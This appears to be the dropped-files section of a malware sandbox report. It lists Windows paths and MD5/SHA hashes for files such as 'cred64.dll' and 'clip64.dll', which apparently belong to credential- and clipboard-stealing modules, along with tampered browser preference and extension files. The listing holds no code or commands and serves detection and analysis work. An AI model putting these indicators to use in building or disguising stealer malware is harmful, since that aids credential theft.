| SHA1 | 1415a93d59e620bcfccc574761d3ab45e88dbb63 |
| SHA256 | 8dd25ef5033a1033c3aaef6927d49c35c09538a0ce06dc0e6d74aa3e647df22b |
| SHA512 | 7c2f1ff1804653c0af124935f05bfe3a6420d162061b996f4c5e37432b9cc75be8f9722a00946d9576459423b600161cd59dd6b4dcc65e8b381a64d1434dffc5 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\additional_file0.tmp
| MD5 | 54ffc65075d71d6b58e7acff0233991f |
| SHA1 | dc6aa42f02c3c25335b7f9880eac98ad1a87624c |
| SHA256 | 507b0c6540fdf00a3083b4584c8c8f75592c9c58c4053930503a269414f3fffb |
| SHA512 | 1a94464736ae740bf8d568642798d1c577e6404e9b24ea567dfcb6bef99a8c9073833af0c8b33f7e6cbdc39dbc255cfd8b02f782910449e3e081aab9239c444b |
C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll
| MD5 | a11a5dfb68a6ea41b0164c2adcd3563f |
| SHA1 | b3738918981417bf2765ba5130767cba4a387822 |
| SHA256 | 6a009663a290735c63d076e1873dff78badb89516aec581b11dc6bb260f83883 |
| SHA512 | 8131a0aa8c03c15ff36e01207b611d8a23916ea3f9ccf9a452212ce806c49391e02e942170274be22b4ef6d13094aeecbea9f50282fbfe64cc345e6328378632 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
| MD5 | 7bf982e55fca36bf1d470264acd37e9c |
| SHA1 | 6f6cf2e8dab446bdb477874f36d65072c74ebd37 |
| SHA256 | cbc2832b385cdc08afd4b0a150fc7cf70643ae60e60d4d910347c6d1d1eb184e |
| SHA512 | 3665a1937060e017d07bbb770fb6bd6b49903564eb762aef3ba7a62f5cb28ec8a87164c34bcaf96bb12270887c08856e0a8d436edd3670a1b88ac2afe9b28675 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
| MD5 | 19a0511c3835f200572372af43cd953c |
| SHA1 | cba4b465443d2f24a4b292e8d287d8f0e9d992b8 |
| SHA256 | 9d552e0a6c64aa82c5644d351cb487aec0999e08e53eec266073930332082aa0 |
| SHA512 | e7bdb99df8ea0f967b99a0981aaff2b2ac9758eab558fee8287c2eae4314de3753cbfe454719030a6f793d9fde361b59a6daf4289d13b307f7c68b53bc2293ee |
C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll
| MD5 | ba8c5dc5ec763007a4af9cb06bef78ef |
| SHA1 | a50aaf51e7d5998a4cb7a4218f463b06fd005b5e |
| SHA256 | 26b468da8e91ddbb807a9f8c95e2bd3f01510cb9438d7ae6134d108900e06b88 |
| SHA512 | e065ea526ee8843db6f74f29b8b545ff0b6333084242aaa9998287ef17a5bf86fb7c3709fc997e31272124468c6f68218759044c5a36cb22f3ec743605eb885c |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe
| MD5 | b3f05009b53af6435e86cfd939717e82 |
| SHA1 | 770877e7c5f03e8d684984fe430bdfcc2cf41b26 |
| SHA256 | 3ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7 |
| SHA512 | d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\dbgcore.dll
| MD5 | 8b6f64e5d3a608b434079e50a1277913 |
| SHA1 | 03f431fabf1c99a48b449099455c1575893d9f32 |
| SHA256 | 926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2 |
| SHA512 | c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\dbghelp.dll
| MD5 | 925ea07f594d3fce3f73ede370d92ef7 |
| SHA1 | f67ea921368c288a9d3728158c3f80213d89d7c2 |
| SHA256 | 6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9 |
| SHA512 | a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2 |
C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll
| MD5 | dbd964c5bacfeccb4182e6c740f70916 |
| SHA1 | e2d3b6d42fd41d890632636cca32d6cb6cdb3d5a |
| SHA256 | 13bad0cbf56b359a0fbe62ea2ea0c2c838e49fa271d7248b2938cb911b9904e0 |
| SHA512 | 50ca2b6c12edfb555304b59662f79c2a2d9ce6c1bc7cdbc44fbebb9c337b061a34f204c1a7c47fb1800ee5bdf85b56115e05f60eb580860fa38329ba7f20cb96 |
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | a0552b13263738b5cb0155770f3160f3 |
| SHA1 | 43c19c4e50cb374518f99e58bbaae880d494b14b |
| SHA256 | a15f7b51bc545c84e15d97e643d265dd4ca5e3b91e8eaa55853d0aa8eb92d405 |
| SHA512 | 74a9d1ef06bf9c98845a46c73969fc4eb813b633a9130c9281096b69b88753eaad8d47cec853d655b0c833da31cadfddead3e0f09543a2981a5e4ab826695ecf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\prefs.js
| MD5 | 6f311177f167a1fb94b13c4576abbe5e |
| SHA1 | 258a40f693889c3f66eb675f228a5df363e8865d |
| SHA256 | 7b7a37ef1bcb21c53cce2a818ba8716f9d7190c8e816f959c8759d4139528fb7 |
| SHA512 | f9b9ea778fd536974fd4b272edc7612eaeb2ee1ad5ea1094c24a299e7ece6855d51f5fc37b0dae5a5e036323fdc1fd3a5790705d51b98a32a0be0708a75ce170 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 33e748959f4844291b38815bfdf32542 |
| SHA1 | 5b3f1b6c8b470bb5516e9d79ec4f60b1bbdba81e |
| SHA256 | f88c30d3fedd2f60583512eb4f37ca29ad07a139c4243a47c5e91cded66b65a0 |
| SHA512 | 978a93418256be2620ab379cbb0d566395565fa84909d1104b576fbbf0a4b6a5f730b9f420aab8af6951b056bb500bed4b4c1be86ccb38719ee1e4053291f2d0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 034e17601abc331135e8a448698f379f |
| SHA1 | c1d7830f1b4aaec0b4af2abec0c3ac03ca7fe7b7 |
| SHA256 | 66ab2f85745ebf705215079bc5059bae08fb453511fd7d2b3ed4cffd85d96db6 |
| SHA512 | 49c680182e6900c8db62e2925d784a7a1fc6f5a7d18784ff8b7688caca39aabbcfd762774962f190c2d161fd8ed77e41ed6d190613963637f85a04555245f1e0 |